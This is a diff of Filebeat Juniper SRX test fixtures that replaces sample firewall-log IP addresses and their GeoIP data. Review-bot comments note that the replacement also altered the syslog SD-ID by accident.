"observer.ingress.zone": "trust", "observer.name": "rtr199", diff --git a/x-pack/filebeat/module/juniper/srx/test/secintel.log b/x-pack/filebeat/module/juniper/srx/test/secintel.log index 12f8f137c7f3..e4d1b13fd759 100644 --- a/x-pack/filebeat/module/juniper/srx/test/secintel.log +++ b/x-pack/filebeat/module/juniper/srx/test/secintel.log 
@@ -1,2 +1,2 @@
-<14>1 2016-10-17T15:18:11.618Z SRX-1500 RT_SECINTEL - SECINTEL_ACTION_LOG [junos@2636.1.1.1.2.129 category="secintel" sub-category="Blacklist" action="BLOCK" action-detail="DROP" http-host="N/A" threat-severity="0" source-address="5.196.121.161" source-port="1" destination-address="10.10.0.10" destination-port="24039" protocol-id="1" application="N/A" nested-application="N/A" feed-name="Tor_Exit_Nodes" policy-name="cc_policy" profile-name="Blacklist" username="N/A" roles="N/A" session-id-32="572564" source-zone-name="Outside" destination-zone-name="DMZ"]
-<14>1 2016-10-17T15:18:11.618Z SRX-1500 RT_SECINTEL - SECINTEL_ACTION_LOG [junos@2636.1.1.1.2.129 category="secintel" sub-category="CC" action="BLOCK" action-detail="CLOSE REDIRECT MSG" http-host="dummy_host" threat-severity="10" source-address="1.1.1.1" source-port="36612" destination-address="10.0.0.1" destination-port="80" protocol-id="6" application="HTTP" nested-application="N/A" feed-name="cc_url_data" policy-name="test" profile-name="test-profile" username="N/A" roles="N/A" session-id-32="502362" source-zone-name="Inside" destination-zone-name="Outside" occur-count="0"]
+<14>1 2016-10-17T15:18:11.618Z SRX-1500 RT_SECINTEL - SECINTEL_ACTION_LOG [junos@2636.81.2.69.144.129 category="secintel" sub-category="Blacklist" action="BLOCK" action-detail="DROP" http-host="N/A" threat-severity="0" source-address="67.43.156.12" source-port="1" destination-address="10.10.0.10" destination-port="24039" protocol-id="1" application="N/A" nested-application="N/A" feed-name="Tor_Exit_Nodes" policy-name="cc_policy" profile-name="Blacklist" username="N/A" roles="N/A" session-id-32="572564" source-zone-name="Outside" destination-zone-name="DMZ"]
+<14>1 2016-10-17T15:18:11.618Z SRX-1500 RT_SECINTEL - SECINTEL_ACTION_LOG [junos@2636.81.2.69.144.129 category="secintel" sub-category="CC" action="BLOCK" action-detail="CLOSE REDIRECT MSG" http-host="dummy_host" threat-severity="10" source-address="89.160.20.156" source-port="36612" destination-address="10.0.0.1" destination-port="80" protocol-id="6" application="HTTP" nested-application="N/A" feed-name="cc_url_data" policy-name="test" profile-name="test-profile" username="N/A" roles="N/A" session-id-32="502362" source-zone-name="Inside" destination-zone-name="Outside" occur-count="0"]
diff --git a/x-pack/filebeat/module/juniper/srx/test/secintel.log-expected.json b/x-pack/filebeat/module/juniper/srx/test/secintel.log-expected.json
index d282ccd1be18..cd6626cb186f 100644
--- a/x-pack/filebeat/module/juniper/srx/test/secintel.log-expected.json
+++ b/x-pack/filebeat/module/juniper/srx/test/secintel.log-expected.json
@@ -1,7 +1,7 @@
 [
 {
 "@timestamp": "2016-10-17T13:18:11.618-02:00",
- "client.ip": "5.196.121.161",
+ "client.ip": "67.43.156.12",
 "client.port": 1,
 "destination.ip": "10.10.0.10",
 "destination.port": 24039,
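Review bot: The sanitisation in both `+` lines also rewrote the syslog structured-data ID, turning `[junos@2636.1.1.1.2.129` into `[junos@2636.81.2.69.144.129`; that token appears to be Juniper's IANA enterprise number (2636) followed by a platform OID suffix rather than an IPv4 address, so the fixture now carries an SD-ID no SRX would emit. Presumably a dotted-quad replacement matched `1.1.1.2` inside the OID by accident while fixing the `source-address` values. I would keep the new `source-address` values but restore `[junos@2636.1.1.1.2.129` in both lines so the test input still exercises the real SD-ID shape, in case anything downstream ever keys on it.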
@@ -13,7 +13,7 @@ "event.dataset": "juniper.srx", "event.kind": "alert", "event.module": "juniper", - "event.original": "category=\"secintel\" sub-category=\"Blacklist\" action=\"BLOCK\" action-detail=\"DROP\" http-host=\"N/A\" threat-severity=\"0\" source-address=\"5.196.121.161\" source-port=\"1\" destination-address=\"10.10.0.10\" destination-port=\"24039\" protocol-id=\"1\" application=\"N/A\" nested-application=\"N/A\" feed-name=\"Tor_Exit_Nodes\" policy-name=\"cc_policy\" profile-name=\"Blacklist\" username=\"N/A\" roles=\"N/A\" session-id-32=\"572564\" source-zone-name=\"Outside\" destination-zone-name=\"DMZ\"", + "event.original": "category=\"secintel\" sub-category=\"Blacklist\" action=\"BLOCK\" action-detail=\"DROP\" http-host=\"N/A\" threat-severity=\"0\" source-address=\"67.43.156.12\" source-port=\"1\" destination-address=\"10.10.0.10\" destination-port=\"24039\" protocol-id=\"1\" application=\"N/A\" nested-application=\"N/A\" feed-name=\"Tor_Exit_Nodes\" policy-name=\"cc_policy\" profile-name=\"Blacklist\" username=\"N/A\" roles=\"N/A\" session-id-32=\"572564\" source-zone-name=\"Outside\" destination-zone-name=\"DMZ\"", "event.outcome": "success", "event.severity": 14, "event.timezone": "-02:00", 
@@ -46,19 +46,18 @@ "observer.vendor": "Juniper", "related.ip": [ "10.10.0.10", - "5.196.121.161" + "67.43.156.12" ], "server.ip": "10.10.0.10", "server.port": 24039, "service.type": "juniper", - "source.as.number": 16276, - "source.as.organization.name": "OVH SAS", - "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "FR", - "source.geo.country_name": "France", - "source.geo.location.lat": 48.8582, - "source.geo.location.lon": 2.3387, - "source.ip": "5.196.121.161", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.12", "source.port": 1, "tags": [ "forwarded", @@ -67,7 +66,7 @@ }, { "@timestamp": "2016-10-17T13:18:11.618-02:00", - "client.ip": "1.1.1.1", + "client.ip": "89.160.20.156", "client.port": 36612, "destination.ip": "10.0.0.1", "destination.port": 80, 
@@ -79,7 +78,7 @@ "event.dataset": "juniper.srx", "event.kind": "alert", "event.module": "juniper", - "event.original": "category=\"secintel\" sub-category=\"CC\" action=\"BLOCK\" action-detail=\"CLOSE REDIRECT MSG\" http-host=\"dummy_host\" threat-severity=\"10\" source-address=\"1.1.1.1\" source-port=\"36612\" destination-address=\"10.0.0.1\" destination-port=\"80\" protocol-id=\"6\" application=\"HTTP\" nested-application=\"N/A\" feed-name=\"cc_url_data\" policy-name=\"test\" profile-name=\"test-profile\" username=\"N/A\" roles=\"N/A\" session-id-32=\"502362\" source-zone-name=\"Inside\" destination-zone-name=\"Outside\" occur-count=\"0\"", + "event.original": "category=\"secintel\" sub-category=\"CC\" action=\"BLOCK\" action-detail=\"CLOSE REDIRECT MSG\" http-host=\"dummy_host\" threat-severity=\"10\" source-address=\"89.160.20.156\" source-port=\"36612\" destination-address=\"10.0.0.1\" destination-port=\"80\" protocol-id=\"6\" application=\"HTTP\" nested-application=\"N/A\" feed-name=\"cc_url_data\" policy-name=\"test\" profile-name=\"test-profile\" username=\"N/A\" roles=\"N/A\" session-id-32=\"502362\" source-zone-name=\"Inside\" destination-zone-name=\"Outside\" occur-count=\"0\"", "event.outcome": "success", "event.severity": 14, "event.timezone": "-02:00", @@ -104,7 +103,7 @@ "juniper.srx.tag": "SECINTEL_ACTION_LOG", "juniper.srx.threat_severity": "10", "log.level": "informational", - "log.offset": 561, + "log.offset": 564, "network.iana_number": "6", "observer.egress.zone": "Outside", "observer.ingress.zone": "Inside", 
@@ -116,20 +115,23 @@ "dummy_host" ], "related.ip": [ - "1.1.1.1", - "10.0.0.1" + "10.0.0.1", + "89.160.20.156" ], "server.ip": "10.0.0.1", "server.port": 80, "service.type": "juniper", - "source.as.number": 13335, - "source.as.organization.name": "Cloudflare, Inc.", - "source.geo.continent_name": "Oceania", - "source.geo.country_iso_code": "AU", - "source.geo.country_name": "Australia", - "source.geo.location.lat": -33.494, - "source.geo.location.lon": 143.2104, - "source.ip": "1.1.1.1", + "source.as.number": 29518, + "source.as.organization.name": "Bredband2 AB", + "source.geo.city_name": "Link\u00f6ping", + "source.geo.continent_name": "Europe", + "source.geo.country_iso_code": "SE", + "source.geo.country_name": "Sweden", + "source.geo.location.lat": 58.4167, + "source.geo.location.lon": 15.6167, + "source.geo.region_iso_code": "SE-E", + "source.geo.region_name": "\u00d6sterg\u00f6tland County", + "source.ip": "89.160.20.156", "source.port": 36612, "tags": [ "forwarded", diff --git a/x-pack/filebeat/module/juniper/srx/test/utm.log b/x-pack/filebeat/module/juniper/srx/test/utm.log index 61c320ae8859..7c336e1e2f2c 100644 --- a/x-pack/filebeat/module/juniper/srx/test/utm.log +++ b/x-pack/filebeat/module/juniper/srx/test/utm.log 
@@ -1,12 +1,12 @@
-<12>1 2016-02-18T01:32:50.391Z utm-srx550-b RT_UTM - WEBFILTER_URL_BLOCKED [junos@2636.1.1.1.2.86 source-address="192.168.1.100" source-port="58071" destination-address="103.235.46.39" destination-port="80" category="cat1" reason="BY_BLACK_LIST" profile="uf1" url="www.baidu.com" obj="/" username="user01" roles="N/A"]
-<12>1 2016-02-18T01:32:50.391Z utm-srx550-b RT_UTM - WEBFILTER_URL_PERMITTED [junos@2636.1.1.1.2.86 source-address="10.10.10.50" source-port="1402" destination-address="216.200.241.66" destination-port="80" category="N/A" reason="BY_OTHER" profile="wf-profile" url="www.checkpoint.com" obj="/css/homepage2012.css" username="user02" roles="N/A"]
-<12>1 2010-02-08T08:29:28.565Z SRX650-1 RT_UTM - AV_VIRUS_DETECTED_MT [junos@2636.1.1.1.2.40 source-address="188.40.238.250" source-port="80" destination-address="10.1.1.103" destination-port="47095" source-zone-name="untrust" filename="www.eicar.org/download/eicar.com" temporary-filename="www.eicar.org/download/eicar.com" name="EICAR-Test-File" url="EICAR-Test-File"]
-<12>1 2010-02-08T08:29:28.565Z SRX650-1 RT_UTM - AV_SCANNER_DROP_FILE_MT [junos@2636.1.1.1.2.40 source-address="74.125.155.147" source-port="80" destination-address="10.1.1.103" destination-port="33578" filename="www.google.com/" error-code="14" error-message="scan engine is not ready"]
-<12>1 2010-01-29T10:59:59.660Z SRX650-1 RT_UTM - AV_HUGE_FILE_DROPPED_MT [junos@2636.1.1.1.2.40 source-address="10.2.1.101" source-port="80" destination-address="10.1.1.103" destination-port="51727" filename="10.2.1.101/images/junos- srxsme-10.2-20100106.0-domestic.tgz"]
-<14>1 2016-02-18T01:33:50.391Z utm-srx550-b RT_UTM - ANTISPAM_SPAM_DETECTED_MT [junos@2636.1.1.1.2.86 source-zone="trust" destination-zone="untrust" source-name="N/A" source-address="10.10.10.1" profile-name="antispam01" action="drop" reason="Match local blacklist" username="user01" roles="N/A"]
-<14>1 2016-02-18T01:34:50.391Z utm-srx550-b RT_UTM - CONTENT_FILTERING_BLOCKED_MT [junos@2636.1.1.1.2.86 source-zone="untrust" destination-zone="trust" protocol="http" source-address="192.0.2.3" source-port="58071" destination-address="198.51.100.2" destination-port="80" profile-name="content02" action="drop" reason="blocked due to file extension block list" username="user01@testuser.com" roles="N/A" filename="test.cmd"]
-<12>1 2016-02-19T01:32:50.391Z utm-srx550-b RT_UTM - WEBFILTER_URL_BLOCKED_LS [junos@2636.1.1.1.2.86 source-address="192.168.1.100" source-port="58071" destination-address="103.235.46.39" destination-port="80" category="cat1" reason="BY_BLACK_LIST" profile="uf1" url="www.baidu.com" obj="/" username="user01" roles="N/A"]
-<12>1 2011-02-08T08:29:28.565Z SRX650-1 RT_UTM - AV_VIRUS_DETECTED_MT_LS [junos@2636.1.1.1.2.40 source-address="188.40.238.250" source-port="80" destination-address="10.1.1.103" destination-port="47095" source-zone-name="untrust" filename="www.eicar.org/download/eicar.com" temporary-filename="www.eicar.org/download/eicar.com" name="EICAR-Test-File" url="EICAR-Test-File"]
-<14>1 2020-07-14T14:16:18.345Z SRX650-1 RT_UTM - WEBFILTER_URL_PERMITTED [junos@2636.1.1.1.2.129 source-zone="trust" destination-zone="untrust" source-address="10.1.1.100" source-port="58974" destination-address="104.26.15.142" destination-port="443" session-id="16297" application="UNKNOWN" nested-application="UNKNOWN" category="Enhanced_Information_Technology" reason="BY_SITE_REPUTATION_MODERATELY_SAFE" profile="WCF1" url="datawrapper.dwcdn.net" obj="/" username="N/A" roles="N/A" application-sub-category="N/A" urlcategory-risk="0"]
-<12>1 2020-07-14T14:16:29.541Z SRX650-1 RT_UTM - WEBFILTER_URL_BLOCKED [junos@2636.1.1.1.2.129 source-zone="trust" destination-zone="untrust" source-address="10.1.1.100" source-port="59075" destination-address="85.114.159.93" destination-port="443" session-id="16490" application="UNKNOWN" nested-application="UNKNOWN" category="Enhanced_Advertisements" reason="BY_SITE_REPUTATION_SUSPICIOUS" profile="WCF1" url="dsp.adfarm1.adition.com" obj="/" username="N/A" roles="N/A" application-sub-category="N/A" urlcategory-risk="3"]
-<12>1 2020-07-14T14:17:04.733Z SRX650-1 RT_UTM - AV_FILE_NOT_SCANNED_DROPPED_MT [junos@2636.1.1.1.2.129 source-zone="trust" destination-zone="untrust" source-address="23.209.86.45" source-port="80" destination-address="10.1.1.100" destination-port="58954" profile-name="Custom-Sophos-Profile" filename="download.cdn.mozilla.net/pub/firefox/releases/78.0.2/update/win64/de/firefox-78.0.2.complete.mar" action="BLOCKED" reason="exceeding maximum content size" error-code="7" username="N/A" roles="N/A"]
+<12>1 2016-02-18T01:32:50.391Z utm-srx550-b RT_UTM - WEBFILTER_URL_BLOCKED [junos@2636.81.2.69.144.86 source-address="192.168.1.100" source-port="58071" destination-address="103.235.46.39" destination-port="80" category="cat1" reason="BY_BLACK_LIST" profile="uf1" url="www.baidu.com" obj="/" username="user01" roles="N/A"]
+<12>1 2016-02-18T01:32:50.391Z utm-srx550-b RT_UTM - WEBFILTER_URL_PERMITTED [junos@2636.81.2.69.144.86 source-address="10.10.10.50" source-port="1402" destination-address="216.200.241.66" destination-port="80" category="N/A" reason="BY_OTHER" profile="wf-profile" url="www.checkpoint.com" obj="/css/homepage2012.css" username="user02" roles="N/A"]
+<12>1 2010-02-08T08:29:28.565Z SRX650-1 RT_UTM - AV_VIRUS_DETECTED_MT [junos@2636.81.2.69.144.40 source-address="89.160.20.112" source-port="80" destination-address="10.1.1.103" destination-port="47095" source-zone-name="untrust" filename="www.eicar.org/download/eicar.com" temporary-filename="www.eicar.org/download/eicar.com" name="EICAR-Test-File" url="EICAR-Test-File"]
+<12>1 2010-02-08T08:29:28.565Z SRX650-1 RT_UTM - AV_SCANNER_DROP_FILE_MT [junos@2636.81.2.69.144.40 source-address="67.43.156.12" source-port="80" destination-address="10.1.1.103" destination-port="33578" filename="www.google.com/" error-code="14" error-message="scan engine is not ready"]
+<12>1 2010-01-29T10:59:59.660Z SRX650-1 RT_UTM - AV_HUGE_FILE_DROPPED_MT [junos@2636.81.2.69.144.40 source-address="10.2.1.101" source-port="80" destination-address="10.1.1.103" destination-port="51727" filename="10.2.1.101/images/junos- srxsme-10.2-20100106.0-domestic.tgz"]
+<14>1 2016-02-18T01:33:50.391Z utm-srx550-b RT_UTM - ANTISPAM_SPAM_DETECTED_MT [junos@2636.81.2.69.144.86 source-zone="trust" destination-zone="untrust" source-name="N/A" source-address="10.10.10.1" profile-name="antispam01" action="drop" reason="Match local blacklist" username="user01" roles="N/A"]
+<14>1 2016-02-18T01:34:50.391Z utm-srx550-b RT_UTM - CONTENT_FILTERING_BLOCKED_MT [junos@2636.81.2.69.144.86 source-zone="untrust" destination-zone="trust" protocol="http" source-address="192.0.2.3" source-port="58071" destination-address="198.51.100.2" destination-port="80" profile-name="content02" action="drop" reason="blocked due to file extension block list" username="user01@testuser.com" roles="N/A" filename="test.cmd"]
+<12>1 2016-02-19T01:32:50.391Z utm-srx550-b RT_UTM - WEBFILTER_URL_BLOCKED_LS [junos@2636.81.2.69.144.86 source-address="192.168.1.100" source-port="58071" destination-address="103.235.46.39" destination-port="80" category="cat1" reason="BY_BLACK_LIST" profile="uf1" url="www.baidu.com" obj="/" username="user01" roles="N/A"]
+<12>1 2011-02-08T08:29:28.565Z SRX650-1 RT_UTM - AV_VIRUS_DETECTED_MT_LS [junos@2636.81.2.69.144.40 source-address="89.160.20.112" source-port="80" destination-address="10.1.1.103" destination-port="47095" source-zone-name="untrust" filename="www.eicar.org/download/eicar.com" temporary-filename="www.eicar.org/download/eicar.com" name="EICAR-Test-File" url="EICAR-Test-File"]
+<14>1 2020-07-14T14:16:18.345Z SRX650-1 RT_UTM - WEBFILTER_URL_PERMITTED [junos@2636.81.2.69.144.129 source-zone="trust" destination-zone="untrust" source-address="10.1.1.100" source-port="58974" destination-address="104.26.15.142" destination-port="443" session-id="16297" application="UNKNOWN" nested-application="UNKNOWN" category="Enhanced_Information_Technology" reason="BY_SITE_REPUTATION_MODERATELY_SAFE" profile="WCF1" url="datawrapper.dwcdn.net" obj="/" username="N/A" roles="N/A" application-sub-category="N/A" urlcategory-risk="0"]
+<12>1 2020-07-14T14:16:29.541Z SRX650-1 RT_UTM - WEBFILTER_URL_BLOCKED [junos@2636.81.2.69.144.129 source-zone="trust" destination-zone="untrust" source-address="10.1.1.100" source-port="59075" destination-address="85.114.159.93" destination-port="443" session-id="16490" application="UNKNOWN" nested-application="UNKNOWN" category="Enhanced_Advertisements" reason="BY_SITE_REPUTATION_SUSPICIOUS" profile="WCF1" url="dsp.adfarm1.adition.com" obj="/" username="N/A" roles="N/A" application-sub-category="N/A" urlcategory-risk="3"]
+<12>1 2020-07-14T14:17:04.733Z SRX650-1 RT_UTM - AV_FILE_NOT_SCANNED_DROPPED_MT [junos@2636.81.2.69.144.129 source-zone="trust" destination-zone="untrust" source-address="67.43.156.12" source-port="80" destination-address="10.1.1.100" destination-port="58954" profile-name="Custom-Sophos-Profile" filename="download.cdn.mozilla.net/pub/firefox/releases/78.0.2/update/win64/de/firefox-78.0.2.complete.mar" action="BLOCKED" reason="exceeding maximum content size" error-code="7" username="N/A" roles="N/A"]
diff --git a/x-pack/filebeat/module/juniper/srx/test/utm.log-expected.json b/x-pack/filebeat/module/juniper/srx/test/utm.log-expected.json
index 42e994e057ec..2750c7af9aac 100644
--- a/x-pack/filebeat/module/juniper/srx/test/utm.log-expected.json
+++ b/x-pack/filebeat/module/juniper/srx/test/utm.log-expected.json
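Review bot: Every `+` line in this hunk now carries an SD-ID of the form `[junos@2636.81.2.69.144.NN` where the old side had `[junos@2636.1.1.1.2.NN` (`.86`, `.40`, `.129`); the `1.1.1.2` there looks like part of Juniper's enterprise-number/platform OID rather than a source IP, and was apparently swept up by the same substitution that updated the `source-address` values. I would revert that part of each line to `[junos@2636.1.1.1.2.86`, `[junos@2636.1.1.1.2.40` and `[junos@2636.1.1.1.2.129` respectively so the fixture still matches what an SRX emits. The expected output for these events carries `"observer.product": "SRX"`; I cannot tell from the hunk whether the pipeline derives that from the SD-ID, but if it does, this input no longer checks the real format. The `source-address` substitutions themselves (`89.160.20.112`, `67.43.156.12`) are consistent with the updated expected JSON.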
@@ -3,13 +3,6 @@ "@timestamp": "2016-02-17T23:32:50.391-02:00", "client.ip": "192.168.1.100", "client.port": 58071, - "destination.as.number": 55967, - "destination.as.organization.name": "Beijing Baidu Netcom Science and Technology Co., Ltd.", - "destination.geo.continent_name": "Asia", - "destination.geo.country_iso_code": "HK", - "destination.geo.country_name": "Hong Kong", - "destination.geo.location.lat": 22.25, - "destination.geo.location.lon": 114.1667, "destination.ip": "103.235.46.39", "destination.port": 80, "event.action": "web_filter", @@ -69,13 +62,6 @@ "@timestamp": "2016-02-17T23:32:50.391-02:00", "client.ip": "10.10.10.50", "client.port": 1402, - "destination.as.number": 6461, - "destination.as.organization.name": "Zayo Bandwidth", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, "destination.ip": "216.200.241.66", "destination.port": 80, "event.category": [ @@ -99,7 +85,7 @@ "juniper.srx.reason": "BY_OTHER", "juniper.srx.tag": "WEBFILTER_URL_PERMITTED", "log.level": "warning", - "log.offset": 319, + "log.offset": 323, "observer.name": "utm-srx550-b", "observer.product": "SRX", "observer.type": "firewall", @@ -129,7 +115,7 @@ }, { "@timestamp": "2010-02-08T06:29:28.565-02:00", - "client.ip": "188.40.238.250", + "client.ip": "89.160.20.112", "client.port": 80, "destination.ip": "10.1.1.103", "destination.port": 47095, 
@@ -141,7 +127,7 @@
 "event.dataset": "juniper.srx",
 "event.kind": "alert",
 "event.module": "juniper",
- "event.original": "source-address=\"188.40.238.250\" source-port=\"80\" destination-address=\"10.1.1.103\" destination-port=\"47095\" source-zone-name=\"untrust\" filename=\"www.eicar.org/download/eicar.com\" temporary-filename=\"www.eicar.org/download/eicar.com\" name=\"EICAR-Test-File\" url=\"EICAR-Test-File\"",
+ "event.original": "source-address=\"89.160.20.112\" source-port=\"80\" destination-address=\"10.1.1.103\" destination-port=\"47095\" source-zone-name=\"untrust\" filename=\"www.eicar.org/download/eicar.com\" temporary-filename=\"www.eicar.org/download/eicar.com\" name=\"EICAR-Test-File\" url=\"EICAR-Test-File\"",
 "event.outcome": "success",
 "event.severity": 12,
 "event.timezone": "-02:00",
@@ -158,7 +144,7 @@
 "juniper.srx.tag": "AV_VIRUS_DETECTED_MT",
 "juniper.srx.temporary_filename": "www.eicar.org/download/eicar.com",
 "log.level": "warning",
- "log.offset": 664,
+ "log.offset": 672,
 "observer.ingress.zone": "untrust",
 "observer.name": "SRX650-1",
 "observer.product": "SRX",
@@ -169,19 +155,22 @@
 ],
 "related.ip": [
 "10.1.1.103",
- "188.40.238.250"
+ "89.160.20.112"
 ],
 "server.ip": "10.1.1.103",
 "server.port": 47095,
 "service.type": "juniper",
- "source.as.number": 24940,
- "source.as.organization.name": "Hetzner Online GmbH",
+ "source.as.number": 29518,
+ "source.as.organization.name": "Bredband2 AB",
+ "source.geo.city_name": "Link\u00f6ping",
 "source.geo.continent_name": "Europe",
- "source.geo.country_iso_code": "DE",
- "source.geo.country_name": "Germany",
- "source.geo.location.lat": 51.2993,
- "source.geo.location.lon": 9.491,
- "source.ip": "188.40.238.250",
+ "source.geo.country_iso_code": "SE",
+ "source.geo.country_name": "Sweden",
+ "source.geo.location.lat": 58.4167,
+ "source.geo.location.lon": 15.6167,
+ "source.geo.region_iso_code": "SE-E",
+ "source.geo.region_name": "\u00d6sterg\u00f6tland County",
+ "source.ip": "89.160.20.112",
 "source.port": 80,
 "tags": [
 "forwarded",
@@ -191,7 +180,7 @@
 },
 {
 "@timestamp": "2010-02-08T06:29:28.565-02:00",
- "client.ip": "74.125.155.147",
+ "client.ip": "67.43.156.12",
 "client.port": 80,
 "destination.ip": "10.1.1.103",
 "destination.port": 33578,
@@ -201,7 +190,7 @@
 "event.dataset": "juniper.srx",
 "event.kind": "event",
 "event.module": "juniper",
- "event.original": "source-address=\"74.125.155.147\" source-port=\"80\" destination-address=\"10.1.1.103\" destination-port=\"33578\" filename=\"www.google.com/\" error-code=\"14\" error-message=\"scan engine is not ready\"",
+ "event.original": "source-address=\"67.43.156.12\" source-port=\"80\" destination-address=\"10.1.1.103\" destination-port=\"33578\" filename=\"www.google.com/\" error-code=\"14\" error-message=\"scan engine is not ready\"",
 "event.outcome": "success",
 "event.severity": 12,
 "event.timezone": "-02:00",
@@ -217,26 +206,25 @@
 "juniper.srx.process": "RT_UTM",
 "juniper.srx.tag": "AV_SCANNER_DROP_FILE_MT",
 "log.level": "warning",
- "log.offset": 1035,
+ "log.offset": 1046,
 "observer.name": "SRX650-1",
 "observer.product": "SRX",
 "observer.type": "firewall",
 "observer.vendor": "Juniper",
 "related.ip": [
 "10.1.1.103",
- "74.125.155.147"
+ "67.43.156.12"
 ],
 "server.ip": "10.1.1.103",
 "server.port": 33578,
 "service.type": "juniper",
- "source.as.number": 15169,
- "source.as.organization.name": "Google LLC",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 37.751,
- "source.geo.location.lon": -97.822,
- "source.ip": "74.125.155.147",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.12",
 "source.port": 80,
 "tags": [
 "forwarded",
@@ -269,7 +257,7 @@
 "juniper.srx.process": "RT_UTM",
 "juniper.srx.tag": "AV_HUGE_FILE_DROPPED_MT",
 "log.level": "warning",
- "log.offset": 1323,
+ "log.offset": 1336,
 "observer.name": "SRX650-1",
 "observer.product": "SRX",
 "observer.type": "firewall",
@@ -316,7 +304,7 @@
 "juniper.srx.reason": "Match local blacklist",
 "juniper.srx.tag": "ANTISPAM_SPAM_DETECTED_MT",
 "log.level": "informational",
- "log.offset": 1595,
+ "log.offset": 1612,
 "observer.egress.zone": "untrust",
 "observer.ingress.zone": "trust",
 "observer.name": "utm-srx550-b",
@@ -369,7 +357,7 @@
 "juniper.srx.reason": "blocked due to file extension block list",
 "juniper.srx.tag": "CONTENT_FILTERING_BLOCKED_MT",
 "log.level": "informational",
- "log.offset": 1892,
+ "log.offset": 1913,
 "network.protocol": "http",
 "observer.egress.zone": "trust",
 "observer.ingress.zone": "untrust",
@@ -399,13 +387,6 @@
 "@timestamp": "2016-02-18T23:32:50.391-02:00",
 "client.ip": "192.168.1.100",
 "client.port": 58071,
- "destination.as.number": 55967,
- "destination.as.organization.name": "Beijing Baidu Netcom Science and Technology Co., Ltd.",
- "destination.geo.continent_name": "Asia",
- "destination.geo.country_iso_code": "HK",
- "destination.geo.country_name": "Hong Kong",
- "destination.geo.location.lat": 22.25,
- "destination.geo.location.lon": 114.1667,
 "destination.ip": "103.235.46.39",
 "destination.port": 80,
 "event.action": "web_filter",
@@ -433,7 +414,7 @@
 "juniper.srx.reason": "BY_BLACK_LIST",
 "juniper.srx.tag": "WEBFILTER_URL_BLOCKED_LS",
 "log.level": "warning",
- "log.offset": 2317,
+ "log.offset": 2342,
 "observer.name": "utm-srx550-b",
 "observer.product": "SRX",
 "observer.type": "firewall",
@@ -463,7 +444,7 @@
 },
 {
 "@timestamp": "2011-02-08T06:29:28.565-02:00",
- "client.ip": "188.40.238.250",
+ "client.ip": "89.160.20.112",
 "client.port": 80,
 "destination.ip": "10.1.1.103",
 "destination.port": 47095,
@@ -475,7 +456,7 @@
 "event.dataset": "juniper.srx",
 "event.kind": "alert",
 "event.module": "juniper",
- "event.original": "source-address=\"188.40.238.250\" source-port=\"80\" destination-address=\"10.1.1.103\" destination-port=\"47095\" source-zone-name=\"untrust\" filename=\"www.eicar.org/download/eicar.com\" temporary-filename=\"www.eicar.org/download/eicar.com\" name=\"EICAR-Test-File\" url=\"EICAR-Test-File\"",
+ "event.original": "source-address=\"89.160.20.112\" source-port=\"80\" destination-address=\"10.1.1.103\" destination-port=\"47095\" source-zone-name=\"untrust\" filename=\"www.eicar.org/download/eicar.com\" temporary-filename=\"www.eicar.org/download/eicar.com\" name=\"EICAR-Test-File\" url=\"EICAR-Test-File\"",
 "event.outcome": "success",
 "event.severity": 12,
 "event.timezone": "-02:00",
@@ -492,7 +473,7 @@
 "juniper.srx.tag": "AV_VIRUS_DETECTED_MT_LS",
 "juniper.srx.temporary_filename": "www.eicar.org/download/eicar.com",
 "log.level": "warning",
- "log.offset": 2639,
+ "log.offset": 2668,
 "observer.ingress.zone": "untrust",
 "observer.name": "SRX650-1",
 "observer.product": "SRX",
@@ -503,19 +484,22 @@
 ],
 "related.ip": [
 "10.1.1.103",
- "188.40.238.250"
+ "89.160.20.112"
 ],
 "server.ip": "10.1.1.103",
 "server.port": 47095,
 "service.type": "juniper",
- "source.as.number": 24940,
- "source.as.organization.name": "Hetzner Online GmbH",
+ "source.as.number": 29518,
+ "source.as.organization.name": "Bredband2 AB",
+ "source.geo.city_name": "Link\u00f6ping",
 "source.geo.continent_name": "Europe",
- "source.geo.country_iso_code": "DE",
- "source.geo.country_name": "Germany",
- "source.geo.location.lat": 51.2993,
- "source.geo.location.lon": 9.491,
- "source.ip": "188.40.238.250",
+ "source.geo.country_iso_code": "SE",
+ "source.geo.country_name": "Sweden",
+ "source.geo.location.lat": 58.4167,
+ "source.geo.location.lon": 15.6167,
+ "source.geo.region_iso_code": "SE-E",
+ "source.geo.region_name": "\u00d6sterg\u00f6tland County",
+ "source.ip": "89.160.20.112",
 "source.port": 80,
 "tags": [
 "forwarded",
@@ -527,13 +511,6 @@
 "@timestamp": "2020-07-14T12:16:18.345-02:00",
 "client.ip": "10.1.1.100",
 "client.port": 58974,
- "destination.as.number": 13335,
- "destination.as.organization.name": "Cloudflare, Inc.",
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 37.751,
- "destination.geo.location.lon": -97.822,
 "destination.ip": "104.26.15.142",
 "destination.port": 443,
 "event.category": [
@@ -560,7 +537,7 @@
 "juniper.srx.session_id": "16297",
 "juniper.srx.tag": "WEBFILTER_URL_PERMITTED",
 "log.level": "informational",
- "log.offset": 3013,
+ "log.offset": 3045,
 "observer.egress.zone": "untrust",
 "observer.ingress.zone": "trust",
 "observer.name": "SRX650-1",
@@ -590,13 +567,6 @@
 "@timestamp": "2020-07-14T12:16:29.541-02:00",
 "client.ip": "10.1.1.100",
 "client.port": 59075,
- "destination.as.number": 24961,
- "destination.as.organization.name": "myLoc managed IT AG",
- "destination.geo.continent_name": "Europe",
- "destination.geo.country_iso_code": "DE",
- "destination.geo.country_name": "Germany",
- "destination.geo.location.lat": 51.2993,
- "destination.geo.location.lon": 9.491,
 "destination.ip": "85.114.159.93",
 "destination.port": 443,
 "event.action": "web_filter",
@@ -626,7 +596,7 @@
 "juniper.srx.session_id": "16490",
